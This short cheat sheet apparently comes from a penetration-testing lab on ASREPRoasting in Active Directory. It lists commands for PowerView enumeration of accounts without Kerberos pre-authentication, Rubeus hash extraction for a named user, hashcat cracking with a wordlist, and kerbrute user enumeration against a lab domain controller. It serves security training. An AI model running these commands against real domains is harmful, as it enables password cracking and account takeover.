# ASREPRoasting

ASREPRoasting is an attack that exploits user accounts in Active Directory that have Kerberos pre-authentication disabled. This allows an attacker to retrieve encrypted Ticket Granting Ticket (TGT) data, which can then be cracked offline to obtain plaintext passwords.

### 1. Enumerate Users with Pre-Authentication Not Required

**Command:**

```
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
```

**Description:** PowerView tool used to search for the DONT\_REQ\_PREAUTH value across user accounts in a target Windows domain. Performed from a Windows-based host.

### 2. Perform ASREPRoasting Attack with Rubeus

**Command:**

```
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
```

**Description:** Uses Rubeus to perform an ASREPRoasting attack and formats the output for Hashcat. Performed from a Windows-based host.

### 3. Crack Captured Hash with Hashcat

**Command:**

```
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt
```

**Description:** Uses Hashcat to attempt to crack the captured ASREP hash using a wordlist (rockyou.txt). Performed from a Linux-based host.

### 4. Enumerate Users and Retrieve ASREP Hashes with Kerbrute

**Command:**

```
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
```

**Description:** Enumerates users in a target Windows domain and automatically retrieves ASREP hashes for any users that do not require Kerberos pre-authentication. Performed from a Linux-based host.